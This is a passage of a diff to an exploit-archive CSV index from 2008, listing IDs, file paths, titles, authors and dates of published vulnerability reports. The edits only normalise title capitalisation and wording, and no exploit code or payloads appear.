6014,platforms/php/webapps/6014.txt,"SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Vuln",2008-07-07,Hamtaro,php,webapps,0 @@ -5654,7 +5654,7 @@ id,file,description,date,author,platform,type,port 6037,platforms/php/webapps/6037.txt,"phpDatingClub (website.php page) Local File Inclusion Vulnerability",2008-07-10,S.W.A.T.,php,webapps,0 6039,platforms/windows/local/6039.c,"Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)",2008-07-11,Shinnok,windows,local,0 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities",2008-07-11,"Nu Am Bani",php,webapps,0 -6041,platforms/php/webapps/6041.txt,"Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerability",2008-07-11,Ciph3r,php,webapps,0 +6041,platforms/php/webapps/6041.txt,"facebook newsroom cms 0.5.0 beta 1 - Remote File Inclusion Vulnerability",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 (LFI/XSS/PHPInfo) Remote Vulnerabilities",2008-10-20,StAkeR,php,webapps,0 6043,platforms/osx/dos/6043.rb,"Core Image Fun House <= 2.0 Arbitrary Code Execution PoC (OSX)",2008-07-11,"Adriel T. Desautels",osx,dos,0 6044,platforms/php/webapps/6044.txt,"Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability",2008-07-11,"Hussin X",php,webapps,0 @@ -5667,9 +5667,9 @@ id,file,description,date,author,platform,type,port 6051,platforms/php/webapps/6051.txt,"Maian Music 1.0 Insecure Cookie Handling Vulnerability",2008-07-12,Saime,php,webapps,0 6053,platforms/php/webapps/6053.php,"fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (php)",2008-07-12,"Inphex and real",php,webapps,0 6054,platforms/php/webapps/6054.pl,"fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)",2008-07-12,"Inphex and real",php,webapps,0 -6055,platforms/php/webapps/6055.pl,"Joomla Component n-forms 1.01 Blind SQL Injection Exploit",2008-07-12,"The Moorish",php,webapps,0 +6055,platforms/php/webapps/6055.pl,"Joomla Component n-forms 1.01 - Blind SQL Injection Exploit",2008-07-12,"The Moorish",php,webapps,0 6056,platforms/php/webapps/6056.txt,"WebCMS Portal Edition (id) Remote SQL Injection Vulnerability",2008-07-12,Mr.SQL,php,webapps,0 -6057,platforms/php/webapps/6057.txt,"jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0 +6057,platforms/php/webapps/6057.txt,"jsite 1.0 oe (sql/lfi) Multiple Vulnerabilities",2008-07-12,S.W.A.T.,php,webapps,0 6058,platforms/php/webapps/6058.txt,"Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability",2008-07-12,"CWH Underground",php,webapps,0 6059,platforms/windows/dos/6059.pl,"Simple DNS Plus <= 5.0/4.1 Remote Denial of Service Exploit",2008-07-13,Exodus,windows,dos,0 6060,platforms/php/webapps/6060.php,"fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit",2008-07-13,"Charles Fol",php,webapps,0 @@ -5681,11 +5681,11 @@ id,file,description,date,author,platform,type,port 6066,platforms/php/webapps/6066.txt,"Maian Search <= 1.1 Insecure Cookie Handling Vulnerability",2008-07-13,S.W.A.T.,php,webapps,0 6067,platforms/php/webapps/6067.pl,"Ultrastats <= 0.2.142 (players-detail.php) Blind SQL Injection Exploit",2008-07-13,DNX,php,webapps,0 6068,platforms/php/webapps/6068.txt,"MFORUM 0.1a Arbitrary Add-Admin Vulnerability",2008-07-13,"CWH Underground",php,webapps,0 -6069,platforms/php/webapps/6069.txt,"ITechBids 7.0 Gold (XSS/SQL) Multiple Remote Vulnerabilities",2008-07-13,Encrypt3d.M!nd,php,webapps,0 +6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold (xss/sql) Multiple Vulnerabilities",2008-07-13,Encrypt3d.M!nd,php,webapps,0 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 6071,platforms/php/webapps/6071.txt,"CodeDB (list.php lang) Local File Inclusion Vulnerability",2008-07-14,cOndemned,php,webapps,0 6072,platforms/windows/dos/6072.html,"Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit",2008-07-14,"Jeremy Brown",windows,dos,0 -6073,platforms/php/webapps/6073.txt,"Bilboblog 2.1 Multiple Remote Vulnerabilities",2008-07-14,BlackH,php,webapps,0 +6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)",2008-07-14,BugReport.IR,php,webapps,0 6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability",2008-07-15,StAkeR,php,webapps,0 6076,platforms/php/webapps/6076.txt,"pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability",2008-07-15,RoMaNcYxHaCkEr,php,webapps,0 @@ -5706,7 +5706,7 @@ id,file,description,date,author,platform,type,port 6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability",2008-07-17,"Hussin X",php,webapps,0 6094,platforms/linux/remote/6094.txt,"Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)",2008-07-17,eliteboy,linux,remote,0 -6095,platforms/php/webapps/6095.pl,"AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit",2008-07-17,GoLd_M,php,webapps,0 +6095,platforms/php/webapps/6095.pl,"AlstraSoft Article Manager Pro 1.6 - Blind SQL Injection Exploit",2008-07-17,GoLd_M,php,webapps,0 6096,platforms/php/webapps/6096.txt,"preCMS v.1 (index.php page) Remote SQL injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0 6097,platforms/php/webapps/6097.txt,"Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability",2008-07-17,QTRinux,php,webapps,0 6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 (index.php page) SQL Injection Vulnerability",2008-07-18,Mr.SQL,php,webapps,0 @@ -5728,7 +5728,7 @@ id,file,description,date,author,platform,type,port 6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 (pid) Remote SQL Injection Vulnerability",2008-07-21,Cr@zy_King,php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling Vulnerability",2008-07-21,"Virangar Security",php,webapps,0 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0 -6117,platforms/php/webapps/6117.txt,"YouTube Blog 0.1 (RFI/SQL/XSS) Multiple Remote Vulnerabilities",2008-07-22,Unohope,php,webapps,0 +6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 (rfi/sql/xss) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll (default.asp catid) SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0 6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0 @@ -5742,7 +5742,7 @@ id,file,description,date,author,platform,type,port 6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability",2008-07-24,IRAQI,php,webapps,0 6129,platforms/minix/dos/6129.txt,"minix 3.1.2a tty panic Remote Denial of Service Vulnerability",2008-07-25,kokanin,minix,dos,0 6130,platforms/multiple/remote/6130.c,"BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)",2008-07-25,"Marc Bevand",multiple,remote,0 -6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 (RFI/XSS/IG) Multiple Remote Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0 +6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 (rfi/xss/ig) Multiple Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 (id) Remote SQL Injection Vulnerability",2008-07-25,nuclear,php,webapps,0 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 (comment.php mid) SQL Injection Vulnerability",2008-07-25,Mr.SQL,php,webapps,0 6134,platforms/php/webapps/6134.txt,"phpTest 0.6.3 (picture.php image_id) Remote SQL Injection Vulnerability",2008-07-25,cOndemned,php,webapps,0 @@ -5762,18 +5762,18 @@ id,file,description,date,author,platform,type,port 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 (language) Local File Inclusion Vulnerability",2008-07-28,NoGe,php,webapps,0 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 Local File Inclusion Vulnerability",2008-07-28,DSecRG,php,webapps,0 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 (language_full) Local File Inclusion Vulnerability",2008-07-28,DSecRG,php,webapps,0 -6151,platforms/windows/remote/6151.txt,"Velocity web-server 1.0 Directory Traversal File Download Vulnerability",2008-07-28,DSecRG,windows,remote,0 +6151,platforms/windows/remote/6151.txt,"velocity web-server 1.0 - Directory Traversal file download vulnerability",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit",2008-07-28,Elazar,windows,remote,0 6153,platforms/php/webapps/6153.txt,"ATutor <= 1.6.1-pl1 (import.php) Remote File Inclusion Vulnerability",2008-07-28,IRCRASH,php,webapps,0 6154,platforms/php/webapps/6154.txt,"ViArt Shop <= 3.5 (category_id) Remote SQL Injection Vulnerability",2008-07-28,"GulfTech Security",php,webapps,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 (lang) Local File Inclusion Vulnerability",2008-07-29,DSecRG,php,webapps,0 6157,platforms/windows/local/6157.pl,"CoolPlayer m3u File Local Buffer Overflow Exploit",2008-07-29,"Guido Landi",windows,local,0 -6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit",2008-07-29,"Virangar Security",php,webapps,0 +6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection Exploit",2008-07-29,"Virangar Security",php,webapps,0 6159,platforms/php/webapps/6159.txt,"Gregarius <= 0.5.4 rsargs[] Remote SQL Injection Vulnerability",2008-07-29,"GulfTech Security",php,webapps,0 6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 (admin.php rd) RFI Vulnerability",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0 6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 (hioxRandomAd.php hm) RFI Vulnerability",2008-07-30,"Ghost Hacker",php,webapps,0 -6162,platforms/php/webapps/6162.txt,"HIOX Browser Statistics 2.0 Remote File Inclusion Vulnerability",2008-07-30,"Ghost Hacker",php,webapps,0 +6162,platforms/php/webapps/6162.txt,"hiox browser statistics 2.0 - Remote File Inclusion Vulnerability",2008-07-30,"Ghost Hacker",php,webapps,0 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 Insecure Cookie Handling Vulnerability",2008-07-30,Stack,php,webapps,0 6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability",2008-07-30,IRCRASH,php,webapps,0 6165,platforms/php/webapps/6165.txt,"ZeeReviews (comments.php ItemID) Remote SQL Injection Vulnerability",2008-07-30,Mr.SQL,php,webapps,0 @@ -5784,7 +5784,7 @@ id,file,description,date,author,platform,type,port 6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script (UID) SQL Injection Vulnerability",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit",2008-07-30,Jack,php,webapps,0 6172,platforms/php/webapps/6172.pl,"Pligg <= 9.9.0 Remote Code Execution Exploit",2008-07-30,"GulfTech Security",php,webapps,0 -6173,platforms/php/webapps/6173.txt,"Pligg <= 9.9.0 (XSS/LFI/SQL) Multiple Remote Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 +6173,platforms/php/webapps/6173.txt,"pligg <= 9.9.0 (xss/lfi/sql) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 6174,platforms/multiple/dos/6174.txt,"F-PROT antivirus 6.2.1.4252 (malformed archive) Infinite Loop DoS Exploit",2008-07-31,kokanin,multiple,dos,0 6175,platforms/windows/remote/6175.html,"NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit",2008-07-31,shinnai,windows,remote,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 Cookie Poisoning and Login Bypass Vulnerability",2008-07-31,gnix,php,webapps,0 @@ -5802,8 +5802,8 @@ id,file,description,date,author,platform,type,port 6188,platforms/windows/local/6188.c,"IrfanView <= 3.99 IFF File Local Stack Buffer Overflow Exploit",2008-08-01,"fl0 fl0w",windows,local,0 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability",2008-08-01,"Hussin X",php,webapps,0 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 Multiple Remote SQL Injection Vulnerabilities",2008-08-01,cOndemned,php,webapps,0 -6191,platforms/php/webapps/6191.txt,"e-Vision CMS <= 2.02 (SQL/Upload/IG) Multiple Remote Vulnerabilities",2008-08-02,IRCRASH,php,webapps,0 -6192,platforms/php/webapps/6192.txt,"K-Links Directory (SQL/XSS) Multiple Remote Vulnerabilities",2008-08-02,Corwin,php,webapps,0 +6191,platforms/php/webapps/6191.txt,"e-vision cms <= 2.02 (sql/upload/ig) Multiple Vulnerabilities",2008-08-02,IRCRASH,php,webapps,0 +6192,platforms/php/webapps/6192.txt,"k-links directory (sql/xss) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0 6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0 @@ -5813,13 +5813,13 @@ id,file,description,date,author,platform,type,port 6201,platforms/windows/dos/6201.html,"HydraIrc <= 0.3.164 (last) Remote Denial of Service Exploit",2008-08-04,securfrog,windows,dos,0 6203,platforms/php/webapps/6203.txt,"Dayfox Blog 4 Multiple Local File Inclusion Vulnerabilities",2008-08-04,"Virangar Security",php,webapps,0 6204,platforms/php/webapps/6204.txt,"Plogger <= 3.0 Remote SQL Injection Vulnerability",2008-08-05,"GulfTech Security",php,webapps,0 -6205,platforms/php/webapps/6205.txt,"IGES CMS <= 2.0 (XSS/SQL) Multiple Remote Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0 +6205,platforms/php/webapps/6205.txt,"iges cms <= 2.0 (xss/sql) Multiple Vulnerabilities",2008-08-05,BugReport.IR,php,webapps,0 6206,platforms/php/webapps/6206.txt,"LiteNews <= 0.1 Insecure Cookie Handling Vulnerability",2008-08-05,Scary-Boys,php,webapps,0 6207,platforms/php/webapps/6207.txt,"LiteNews <= 0.1 (id) Remote SQL Injection Vulnerability",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products (LFI) Code Execution Vulnerability",2008-08-06,otmorozok428,php,webapps,0 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final Remote Code Execution Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0 -6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 (LFI/XSS) Multiple Remote Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 +6211,platforms/php/webapps/6211.txt,"quate cms 0.3.4 (lfi/xss) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 Insecure Cookie Handling Vulnerability",2008-08-06,Scary-Boys,php,webapps,0 6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit",2008-08-06,james,php,webapps,0 6215,platforms/php/webapps/6215.txt,"Ppim <= 1.0 (Arbitrary File Delete/XSS) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0 @@ -5835,7 +5835,7 @@ id,file,description,date,author,platform,type,port 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 (image.php id) SQL Injection Vulnerability",2008-08-10,nuclear,php,webapps,0 -6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0 +6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection Vulnerability",2008-08-11,"Hussin X",php,webapps,0 6231,platforms/php/webapps/6231.txt,"Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 (item) Remote SQL Injection Vulnerability",2008-08-11,IRCRASH,php,webapps,0 @@ -5851,7 +5851,7 @@ id,file,description,date,author,platform,type,port 6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 (id) Multiple Local File Inclusion Vulnerabilities",2008-08-15,Don,php,webapps,0 6248,platforms/windows/remote/6248.pl,"FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit",2008-08-15,SkOd,windows,remote,21 6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability",2008-08-15,"Hussin X",php,webapps,0 -6250,platforms/php/webapps/6250.txt,"DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities",2008-08-15,IRCRASH,php,webapps,0 +6250,platforms/php/webapps/6250.txt,"deeemm cms (dmcms) 0.7.4 Multiple Vulnerabilities",2008-08-15,IRCRASH,php,webapps,0 6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 Privilege Escalation PoC",2008-08-16,g_,windows,dos,0 6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i tta File Parsing Heap Overflow PoC",2008-08-16,g_,multiple,dos,0 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 Local Heap Overflow DOS / PoC",2008-08-16,j0rgan,windows,dos,0 @@ -5862,7 +5862,7 @@ id,file,description,date,author,platform,type,port 6258,platforms/php/webapps/6258.txt,"PHPBasket (product.php pro_id) SQL Injection Vulnerability",2008-08-17,r45c4l,php,webapps,0 6259,platforms/php/webapps/6259.txt,"VidiScript (Avatar) Remote Arbitrary File Upload Vulnerability",2008-08-18,InjEctOr5,php,webapps,0 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 Multiple Remote SQL Injection Vulnerabilities",2008-08-18,cOndemned,php,webapps,0 -6261,platforms/php/webapps/6261.txt,"PHP Live Helper <= 2.0.1 Multiple Remote Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 +6261,platforms/php/webapps/6261.txt,"php live helper <= 2.0.1 Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 6262,platforms/windows/dos/6262.txt,"VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability",2008-08-18,g_,windows,dos,0 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 (configure) Remote File Disclosure Vulnerability",2008-08-19,Th1nk3r,cgi,webapps,0 6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory (id) SQL Injection Vulnerability",2008-08-19,"Hussin X",php,webapps,0 @@ -5878,11 +5878,11 @@ id,file,description,date,author,platform,type,port 6285,platforms/php/webapps/6285.txt,"PhotoCart <= 3.9 Multiple Remote SQL Injection Vulnerabilities",2008-08-21,~!Dok_tOR!~,php,webapps,0 6286,platforms/php/webapps/6286.txt,"BandSite CMS 1.1.4 (Download Backup/XSS/CSRF) Remote Vulnerabilities",2008-08-21,SirGod,php,webapps,0 6287,platforms/php/webapps/6287.txt,"tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability",2008-08-21,cOndemned,php,webapps,0 -6288,platforms/php/webapps/6288.txt,"EasySite 2.3 Multiple Remote Vulnerabilities",2008-08-21,SirGod,php,webapps,0 -6291,platforms/php/webapps/6291.txt,"NoName Script <= 1.1 Multiple Remote Vulnerabilities",2008-08-23,SirGod,php,webapps,0 -6292,platforms/php/webapps/6292.txt,"OneNews Beta 2 (XSS/HI/SQL) Multiple Remote Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 +6288,platforms/php/webapps/6288.txt,"easysite 2.3 Multiple Vulnerabilities",2008-08-21,SirGod,php,webapps,0 +6291,platforms/php/webapps/6291.txt,"noname script <= 1.1 Multiple Vulnerabilities",2008-08-23,SirGod,php,webapps,0 +6292,platforms/php/webapps/6292.txt,"onenews beta 2 (xss/hi/sql) Multiple Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 6293,platforms/multiple/dos/6293.txt,"VLC 0.8.6i MMS Protocol Handling Heap Overflow PoC",2008-08-23,g_,multiple,dos,0 -6294,platforms/php/webapps/6294.txt,"5 Star Review (XSS/SQL) Multiple Remote Vulnerabilities",2008-08-24,Mr.SQL,php,webapps,0 +6294,platforms/php/webapps/6294.txt,"5 star review (xss/sql) Multiple Vulnerabilities",2008-08-24,Mr.SQL,php,webapps,0 6295,platforms/php/webapps/6295.txt,"MiaCMS <= 4.6.5 Multiple Remote SQL Injection Vulnerabilities",2008-08-24,~!Dok_tOR!~,php,webapps,0 6296,platforms/php/webapps/6296.txt,"BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability",2008-08-25,InATeam,php,webapps,0 6297,platforms/php/webapps/6297.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2008-08-25,~!Dok_tOR!~,php,webapps,0 @@ -5897,7 +5897,7 @@ id,file,description,date,author,platform,type,port 6309,platforms/php/webapps/6309.txt,"z-breaknews 2.0 (single.php) Remote SQL Injection Vulnerability",2008-08-26,cOndemned,php,webapps,0 6310,platforms/php/webapps/6310.txt,"Kolifa.net Download Script 1.2 (id) SQL Injection Vulnerability",2008-08-26,Kacak,php,webapps,0 6311,platforms/php/webapps/6311.php,"Simple PHP Blog (SPHPBlog) <= 0.5.1 Code Execution Exploit",2008-08-26,mAXzA,php,webapps,0 -6312,platforms/php/webapps/6312.txt,"K-Rate (SQL/XSS) Multiple Remote Vulnerabilities",2008-08-26,Corwin,php,webapps,0 +6312,platforms/php/webapps/6312.txt,"k-rate (sql/xss) Multiple Vulnerabilities",2008-08-26,Corwin,php,webapps,0 6313,platforms/php/webapps/6313.txt,"CMME 1.12 (LFI/XSS/CSRF/Backup/MkDir) Multiple Vulnerabilities",2008-08-26,SirGod,php,webapps,0 6314,platforms/php/webapps/6314.txt,"Thickbox Gallery 2.0 - (admins.php) Admin Data Disclosure Vulnerability",2008-08-26,SirGod,php,webapps,0 6315,platforms/php/webapps/6315.txt,"iFdate <= 2.0.3 Remote SQL Injection Vulnerability",2008-08-26,~!Dok_tOR!~,php,webapps,0 @@ -5916,14 +5916,14 @@ id,file,description,date,author,platform,type,port 6328,platforms/solaris/remote/6328.c,"Sun Solaris <= 10 snoop(1M) Utility Remote Exploit",2008-08-29,andi,solaris,remote,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BOF Exploit",2008-08-29,Koshi,windows,local,0 6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI (CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 -6332,platforms/php/webapps/6332.txt,"Brim 2.0.0 (SQL/XSS) Multiple Remote Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 +6332,platforms/php/webapps/6332.txt,"brim 2.0.0 (sql/xss) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 (bcproj file) Local BOF Exploit",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 6335,platforms/php/webapps/6335.txt,"Web Directory Script 1.5.3 (site) SQL Injection Vulnerability",2008-08-31,"Hussin X",php,webapps,0 6336,platforms/php/webapps/6336.txt,"Words tag script 1.2 (word) Remote SQL Injection Vulnerability",2008-08-31,"Hussin X",php,webapps,0 6337,platforms/linux/local/6337.sh,"Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit",2008-08-31,RoMaNSoFt,linux,local,0 -6338,platforms/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 (XSS/SQL) Multiple Remote Vulnerabilities",2008-08-31,MustLive,php,webapps,0 -6339,platforms/php/webapps/6339.txt,"WeBid 0.5.4 Multiple Remote Vulnerabilities",2008-08-31,InjEctOr5,php,webapps,0 +6338,platforms/php/webapps/6338.txt,"myphpnuke < 1.8.8_8rc2 (xss/sql) Multiple Vulnerabilities",2008-08-31,MustLive,php,webapps,0 +6339,platforms/php/webapps/6339.txt,"webid 0.5.4 Multiple Vulnerabilities",2008-08-31,InjEctOr5,php,webapps,0 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 (item.php id) Remote SQL Injection Vulnerability",2008-09-01,Stack,php,webapps,0 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 (go) Remote SQL Injection Vulnerability",2008-09-01,e.wiZz!,php,webapps,0 6343,platforms/php/webapps/6343.txt,"CMSbright (id_rub_page) Remote SQL Injection Vulnerability",2008-09-01,"BorN To K!LL",php,webapps,0 @@ -5940,11 +5940,11 @@ id,file,description,date,author,platform,type,port 6354,platforms/php/webapps/6354.txt,"Spice Classifieds (cat_path) Remote SQL Injection Vulnerability",2008-09-03,InjEctOr5,php,webapps,0 6355,platforms/windows/remote/6355.txt,"Google Chrome Browser 0.2.149.27 Automatic File Download Exploit",2008-09-03,nerex,windows,remote,0 6356,platforms/php/webapps/6356.php,"Moodle <= 1.8.4 Remote Code Execution Exploit",2008-09-03,zurlich.lpt,php,webapps,0 -6357,platforms/php/webapps/6357.txt,"aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 +6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 (upload/sql/xss) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 (fckeditor) Remote Arbitrary File Upload Vulnerability",2008-09-03,BugReport.IR,php,webapps,0 6361,platforms/php/webapps/6361.txt,"Living Local Website (listtest.php r) SQL Injection Vulnerability",2008-09-03,"Hussin X",php,webapps,0 6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0 -6363,platforms/php/webapps/6363.txt,"Qwicsite Pro (SQL/XSS) Multiple Remote Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 +6363,platforms/php/webapps/6363.txt,"qwicsite pro (sql/xss) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop (cid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0 6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC",2008-09-04,WHK,windows,dos,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC",2008-09-05,ShadOS,hardware,remote,0 @@ -5995,9 +5995,9 @@ id,file,description,date,author,platform,type,port 6416,platforms/php/webapps/6416.txt,"Libera CMS <= 1.12 (Cookie) Remote SQL Injection Exploit",2008-09-10,StAkeR,php,webapps,0 6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script (jid) SQL Injection Vulnerability (auth)",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite / Jaw Portal free (fckeditor) Arbitrary File Upload 